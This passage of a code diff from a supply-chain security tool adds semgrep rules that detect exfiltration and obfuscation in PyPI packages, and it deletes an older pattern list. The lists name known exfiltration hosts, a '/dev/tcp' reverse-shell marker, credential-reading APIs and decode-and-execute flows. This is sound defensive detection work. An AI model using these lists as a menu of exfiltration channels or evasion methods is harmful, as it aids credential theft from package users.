ConfigurationError(error_msg) + + section_name = "heuristic.pypi" + + if defaults.has_section(section_name): + section = defaults[section_name] + else: + error_msg = f"Unable to find section {section_name}, which must be present." 
+ logger.debug(error_msg) + raise ConfigurationError(error_msg) + + configuration_name = "custom_semgrep_rules" + custom_rule_path = section.get(configuration_name) + if not custom_rule_path: # i.e. None or empty string + logger.debug("No custom path listed under %s, using default rules only.", configuration_name) + return default_rule_path, None + + custom_rule_path = os.path.normpath(custom_rule_path) + if not os.path.exists(custom_rule_path): + error_msg = f"Unable to locate path {custom_rule_path}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = f"Unable to run semgrep validation on {custom_rule_path} with arguments {semgrep_commands}: {semgrep_error}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep validation on {custom_rule_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise ConfigurationError(error_msg) + + logger.debug("Including custom ruleset from %s.", custom_rule_path) + return default_rule_path, custom_rule_path + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package for malicious patterns. + + This is the first phase of the source code analyzer. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + if there is no source code available. 
+ """ + analysis_result: dict = {} + # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] + result: HeuristicResult = HeuristicResult.PASS + + source_code_path = pypi_package_json.package_sourcecode_path + if not source_code_path: + error_msg = "Unable to retrieve PyPI package source code path" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_commands.extend(["--config", self.default_rule_path]) + if self.custom_rule_path: + semgrep_commands.extend(["--config", self.custom_rule_path]) + semgrep_commands.append(source_code_path) + + with tempfile.NamedTemporaryFile(mode="w+", delete=True) as output_json_file: + semgrep_commands.append(f"--json-output={output_json_file.name}") + try: + process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec + except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: + error_msg = ( + f"Unable to run semgrep on {source_code_path} with arguments {semgrep_commands}: {semgrep_error}" + ) + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) from semgrep_error + + if process.returncode != 0: + error_msg = f"Error running semgrep on {source_code_path} with arguments" f" {process.args}" + logger.debug(error_msg) + raise HeuristicAnalyzerValueError(error_msg) + + semgrep_output = json.loads(output_json_file.read()) + + if not semgrep_output: + return result, {} + + semgrep_findings = json_extract(semgrep_output, ["results"], list) + if not semgrep_findings: + return result, {} + + result = HeuristicResult.FAIL # some semgrep rules were triggered + for finding in semgrep_findings: + rule_id = json_extract(finding, ["check_id"], str) + file = json_extract(finding, ["path"], str) + if not rule_id or not file: + continue + + file = os.path.relpath(file, os.path.dirname(source_code_path)) + start = 
json_extract(finding, ["start", "line"], int) + end = json_extract(finding, ["end", "line"], int) + message = json_extract(finding, ["extra", "message"], str) + + if rule_id not in analysis_result: + analysis_result[rule_id] = {"message": message, "detections": []} + + analysis_result[rule_id]["detections"].append({"file": file, "start": start, "end": end}) + + return result, analysis_result diff --git a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml b/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml deleted file mode 100644 index 9c15144d4..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/suspicious_pattern.yaml +++ /dev/null @@ -1,101 +0,0 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - - -#This file defines the malicious pattern. -#The pattern is collected from the malware repository of Pypi.org. 
-imports: -- requests -- base64 -- Fernet -- telebot -- platform -- ClientSession -- socket -- os -- getpass -- telegram -- __pyarmor__ -- urllib.request.urlopen -- subprocess -- Request - -ast_calls: - os_detection: - - os.name - code_execution: - - exec - - subprocess.run - - subprocess.call - - subprocess.Popen - - subprocess.check_call - - os.system - info_collecting: - - os.getcwd - - os.getlogin - - os.getenv - - os.environ - - os.uname - - getpass.getuser - - socket.gethostname - - platform.node - - platform.system - - platform.version - - keyboard.on_release - obfuscation: - - base64.b64decode - - __pyarmor__ - # - Fernet.decrypt - remote_connection: - - requests.get - - requests.post - - telegram.send_document - - urllib.request.urlopen - - urllib.request.urlretrieve - - Request - - socket.socket - custom_setup: - - install - reverse_shell: - - os.dup2 - -ast_constant: - domains: - - webhook.site - - discord - - cdn.discordapp.com - - oast.fun - - api.telegram.org - - diddlydingusdu.de # builderknower2 - - pipedream.net # business-kpi-manager - - 2.tcp.ngrok.io - - files.pypihosted.org - - filebin.net - - akinasouls.fr - - api.ipify.org # Get public IP of the victim - - httpbin.or - - ngrok.ap - - oastify.com - - pythonanywhere.com - - deliverycontent.online - local_path: - - /storage/emulated/0 # Android: primary user account on the device - - /etc/resolv.conf # DNS - - /etc/hosts # DNS - - /sys/class/net # Network related - - /run/systemd/resolve/stub-resolv.conf - - /sdcard/DCIM # Photo storage - executable: - - .exe - windows: - - APPDATA - - Start-Process # Execute command - - powershell - reverse_shell: - - /dev/tcp - os_detection: - - nt # Windows - - Windows - - Darwin # MacOS - - Linux - - posix # Linux diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index 7525c3779..cd9b331a7 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -67,7 
+67,7 @@ def find_repo( break if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}) + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml new file mode 100644 index 000000000..fd96eeef0 --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -0,0 +1,271 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +rules: +- id: exfiltration_remote-exfiltration + metadata: + description: Detects the flow of sensitive information to a remote endpoint. + message: Detected exfiltration of sensitive data to a remote endpoint + languages: + - python + severity: ERROR + mode: taint + options: + # this will help us detect the flow of objects for exfiltration, like + # "with requests.Session() as s: s.get(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # result of code/command evaluation + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) 
+ - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + - pattern: os.popen(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # environment variables + - pattern: os.environ + - pattern: os.environ[...] + - pattern: os.environ.get(...) + - pattern: os.environb + - pattern: os.environb[...] + - pattern: os.environb.get(...) + - pattern: os.getenv(...) + - pattern: os.getenvb(...) + + # system information + - pattern: os.uname(...) + - pattern: os.confstr(...) + - pattern: os.confstr_names + - pattern: os.sysconf(...) + - pattern: os.sysconf_names + - pattern: platform.release(...) + - pattern: platform.version(...) + - pattern: platform.uname(...) + - pattern: platform.win32_ver(...) + - pattern: platform.win32_edition(...) + - pattern: platform.win32_is_iot(...) + - pattern: platform.mac_ver(...) + - pattern: platform.ios_ver(...) + - pattern: platform.libc_ver(...) + - pattern: platform.freedesktop_os_release(...) + - pattern: platform.android_ver(...) + + # network information + - pattern: psutil.net_connections(...) + - pattern: psutil.net_if_addrs(...) + - pattern: psutil.net_if_stats(...) + - pattern: platform.node(...) + - pattern: platform.platform(...) + - pattern: socket.gethostname(...) + - pattern: socket.gethostbyname(...) + - pattern: socket.gethostbyname_ex(...) + - pattern: socket.getfqdn(...) + - pattern: socket.if_nameindex(...) + + # user information + - pattern: psutil.users(...) 
+ + # sensitive information + - pattern: getpass.getpass(...) + - pattern: getpass.unix_getpass(...) + - pattern: getpass.win_getpass(...) + - pattern: getpass.getuser(...) + - pattern: pwd.getpwuid(...) + - pattern: pwd.getpwnam(...) + - pattern: pwd.getpwall(...) + - pattern: keyring.get_keyring(...) + - pattern: keyring.get_password(...) + - pattern: keyring.get_credential(...) + + # file exfiltration + - pattern: os.read(...) + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern-either: + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... + - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) 
+ - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) 
+ - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml new file mode 100644 index 000000000..6d6ea066b --- /dev/null +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -0,0 +1,313 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +rules: +- id: obfuscation_inline-imports + metadata: + description: Detects use of inline imports with suspicious APIs, or obfuscated API imports. + message: Found an instance of a suspicious API in a hardcoded inline import + languages: + - python + severity: ERROR + pattern-either: + - pattern: __import__('base64') + - pattern: __import__('builtins') + - pattern: __import__('subprocess') + - pattern: __import__('sys') + - pattern: __import__('os') + - pattern: __import__('zlib') + - pattern: __import__('marshal') + # python will evaluate a hex/oct string + - patterns: + - pattern: __import__('$HEX') + - metavariable-regex: + metavariable: $HEX + regex: (\\x\d{2})+ + - patterns: + - pattern: __import__('$OCT') + - metavariable-regex: + metavariable: $OCT + regex: (\\\d{3})+ + +- id: obfuscation_obfuscation-tools + metadata: + description: Detects the use of common python obfuscation packages. + message: Found an indicator of the use of a python code obfuscation tool + languages: + - python + severity: ERROR + pattern-either: + # pyarmor: pyarmor.readthedocs.io/en/latest/index.html + - pattern: import __pyarmor__ + - pattern: from $MODULE import __pyarmor__ + - pattern: from $MODULE import pyarmor_runtime + - pattern: __import__('__pyarmor__') + # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern: __assert_armored__($PAYLOAD) + # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html + - pattern-regex: ^\s*#\s*pyarmor:.* + # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 + - patterns: + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... + - metavariable-regex: + metavariable: $OBF + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) + # obfuscated using pyobfuscate.com + - pattern: pyobfuscate=... 
+ # obfuscated using liftoff.github.io/pyminifier + - pattern: import mystificate + - pattern: import demiurgic + +- id: obfuscation_decode-and-execute + metadata: + description: Detects the flow of a decoded or constructed string to process execution, code evaluation, network connections, or file writes. + message: Detected the flow of a decoded primitive value to a remote endpoint, process, code evaluation, or file write + languages: + - python + severity: ERROR + mode: taint + options: + # This will help detect partial things over multiple lines like: "x = builtins.bytes; x.decode(...)" + symbolic_propagation: true + pattern-sources: + - pattern-either: + # marshal encryption + - pattern: marshal.loads(...) + - pattern: __import__('marshal').loads(...) + # bytes decoding + - pattern: | + b'...'.decode(...) + - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) + # decompression + - pattern: zlib.decompress(...) + - pattern: __import__('zlib').decompress(...) + # base64 decoded string values + - pattern: base64.b64decode(...) + - pattern: __import__('base64').b64decode(...) + - pattern: b64decode(...) + # hex encoded values + - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) + # unicode construction + - patterns: + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - metavariable-regex: + metavariable: $FOO + regex: unicode|unichr|chr|ord + + pattern-sinks: + - pattern-either: + # remote connection + # using socket module + - patterns: + - pattern-either: + - patterns: + - pattern-either: + - pattern-inside: | + $SOC = socket.socket(...) + ... + - pattern-inside: | + with socket.socket(...) as $SOC: + ... 
+ - pattern-either: + - pattern-inside: | + $SOC.connect(...) + ... + - pattern-inside: | + $SOC.connect_ex(...) + ... + - pattern-inside: | + $SOC.bind(...) + ... + # socket.socket and socket.connect in one call + - pattern-inside: | + $SOC = socket.create_connection(...) + ... + - pattern-inside: | + with socket.create_connection(...) as $SOC: + ... + # socket.socket and socket.bind in one call + - pattern-inside: | + $SOC = socket.create_server(...) + ... + - pattern-inside: | + with socket.create_server(...) as $SOC: + ... + - pattern-either: + # Assume that .accept, .listen was called somewhere if needed + - pattern: $SOC.send(...) + - pattern: $SOC.recv(...) + - pattern: $SOC.recvfrom(...) + - pattern: $SOC.recvmsg(...) + - pattern: $SOC.recvmsg_into(...) + - pattern: $SOC.recvfrom_into(...) + - pattern: $SOC.recv_into(...) + - pattern: $SOC.sendall(...) + - pattern: $SOC.sendto(...) + - pattern: $SOC.sendmsg(...) + - pattern: $SOC.sendmsg_afalg(...) + - pattern: $SOC.sendfile(...) + # using requests module + - pattern: requests.get(...) + - pattern: requests.post(...) + - pattern: requests.put(...) + - pattern: requests.delete(...) + - pattern: requests.head(...) + - pattern: requests.options(...) + - pattern: requests.patch(...) + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) + - pattern: requests.Request(...) + # using urllib3 module + - pattern: urllib3.request(...) + # object creation here is included as decoded values may be passed as parameters + - pattern: urllib3.PoolManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) 
+ - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) + # using urllib + - pattern: urllib.request(...) + - pattern: urllib.request.urlopen(...) + # using httpx + - pattern: httpx.request(...) + - pattern: httpx.get(...) + - pattern: httpx.post(...) + - pattern: httpx.put(...) + - pattern: httpx.delete(...) + - pattern: httpx.head(...) + - pattern: httpx.options(...) + - pattern: httpx.stream(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...) 
+ - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) + + # process spawning + # using subprocess module + - pattern: subprocess.check_output(...) + - pattern: subprocess.check_call(...) + - pattern: subprocess.run(...) + - pattern: subprocess.call(...) + - pattern: subprocess.Popen(...) + - pattern: subprocess.getoutput(...) + - pattern: subprocess.getstatusoutput(...) + # using os module + - pattern: os.execl(...) + - pattern: os.execle(...) + - pattern: os.execlp(...) + - pattern: os.execlpe(...) + - pattern: os.execv(...) + - pattern: os.execve(...) + - pattern: os.execvp(...) + - pattern: os.execvpe(...) + - pattern: os.popen(...) + - pattern: os.posix_spawn(...) + - pattern: os.posix_spawnp(...) + - pattern: os.spawnl(...) + - pattern: os.spawnle(...) + - pattern: os.spawnlp(...) + - pattern: os.spawnlpe(...) + - pattern: os.spawnv(...) + - pattern: os.spawnve(...) + - pattern: os.spawnvp(...) + - pattern: os.spawnvpe(...) + - pattern: os.system(...) + # using commands module + - pattern: commands.getstatusoutput(...) + - pattern: commands.getoutput(...) + # using runpy module + - pattern: runpy.run_module(...) + - pattern: runpy.run_path(...) + + # code evaluation/execution + - pattern: exec(...) + - pattern: eval(...) + - pattern: builtins.exec(...) + - pattern: builtins.eval(...) + - pattern: __import__('builtins').exec(...) + - pattern: __import__('builtins').eval(...) + + # file write + - patterns: + - pattern-either: + - pattern-inside: | + with open(...) as $FILE: + ... + - pattern-inside: | + with builtins.open(...) as $FILE: + ... + - pattern-inside: | + with __import__('builtins').open(...) 
as $FILE: + ... + - pattern-inside: | + $FILE = open(...) + ... + - pattern-inside: | + $FILE = builtins.open(...) + ... + - pattern-inside: | + $FILE = __import__('builtins').open(...) + ... + - pattern: $FILE.write(...) + - pattern: os.write(...) + - pattern: os.writev(...) + - pattern: os.pwrite(...) + - pattern: os.pwritev(...) diff --git a/src/macaron/slsa_analyzer/analyze_context.py b/src/macaron/slsa_analyzer/analyze_context.py index 84d8151f2..0f0804dc1 100644 --- a/src/macaron/slsa_analyzer/analyze_context.py +++ b/src/macaron/slsa_analyzer/analyze_context.py @@ -51,8 +51,8 @@ class ChecksOutputs(TypedDict): """The provenance and related information.""" local_artifact_paths: list[str] """The local artifact absolute paths.""" - validate_malware: bool - """True when the malware validation is enabled.""" + analyze_source: bool + """True when PyPI source code analysis has been enabled.""" class AnalyzeContext: @@ -106,7 +106,7 @@ def __init__( expectation=None, provenance_info=None, local_artifact_paths=[], - validate_malware=False, + analyze_source=False, ) @property diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index e3957e875..ed5dfe039 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -136,8 +136,8 @@ def run( sbom_path: str = "", deps_depth: int = 0, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> int: """Run the analysis and write results to the output path. @@ -154,10 +154,10 @@ def run( The depth of dependency resolution. Default: 0. provenance_payload : InToToPayload | None The provenance intoto payload for the main software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. 
Defaults to False. Returns ------- @@ -190,8 +190,8 @@ def run( main_config, analysis, provenance_payload=provenance_payload, - validate_malware=validate_malware, verify_provenance=verify_provenance, + analyze_source=analyze_source, ) if main_record.status != SCMStatus.AVAILABLE or not main_record.context: @@ -309,8 +309,8 @@ def run_single( analysis: Analysis, existing_records: dict[str, Record] | None = None, provenance_payload: InTotoPayload | None = None, - validate_malware: bool = False, verify_provenance: bool = False, + analyze_source: bool = False, ) -> Record: """Run the checks for a single repository target. @@ -327,10 +327,10 @@ def run_single( The mapping of existing records that the analysis has run successfully. provenance_payload : InToToPayload | None The provenance intoto payload for the analyzed software component. - validate_malware: bool - Enable malware validation if True. verify_provenance: bool Enable provenance verification if True. + analyze_source : bool + When true, triggers source code analysis for PyPI packages. Defaults to False. Returns ------- @@ -541,7 +541,7 @@ def run_single( # TODO Add release tag, release digest. 
) - analyze_ctx.dynamic_data["validate_malware"] = validate_malware + analyze_ctx.dynamic_data["analyze_source"] = analyze_source if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index c69de3bde..0196ec93b 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -13,7 +13,7 @@ from macaron.database.db_custom_types import DBJsonDict from macaron.database.table_definitions import CheckFacts -from macaron.errors import HeuristicAnalyzerValueError +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError, SourceCodeError from macaron.json_tools import JsonType, json_extract from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics @@ -25,7 +25,7 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.source_code_repo import SourceCodeRepoAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.unchanged_release import UnchangedReleaseAnalyzer from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer -from macaron.malware_analyzer.pypi_heuristics.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck @@ -100,26 +100,44 @@ def _should_skip( return True return False - def validate_malware(self, 
pypi_package_json: PyPIPackageJsonAsset) -> tuple[bool, dict[str, JsonType] | None]: - """Validate the package is malicious. + def analyze_source( + self, pypi_package_json: PyPIPackageJsonAsset, results: dict[Heuristics, HeuristicResult] + ) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the source code of the package with a textual scan, looking for malicious code patterns. Parameters ---------- pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + results: dict[Heuristics, HeuristicResult] + Containing all heuristics' results (excluding this one), where the key is the heuristic and the value is the result + associated with that heuristic. Returns ------- - tuple[bool, dict[str, JsonType] | None] - Returns True if the source code includes suspicious pattern. - Returns the result of the validation including the line number - and the suspicious arguments. - e.g. requests.get("http://malicious.com") - return the "http://malicious.com" + tuple[HeuristicResult, dict[str, JsonType]] + Containing the analysis results and relevant patterns identified. + + Raises + ------ + HeuristicAnalyzerValueError + If the analyzer fails due to malformed package information. + ConfigurationError + If the configuration of the analyzer encountered a problem. 
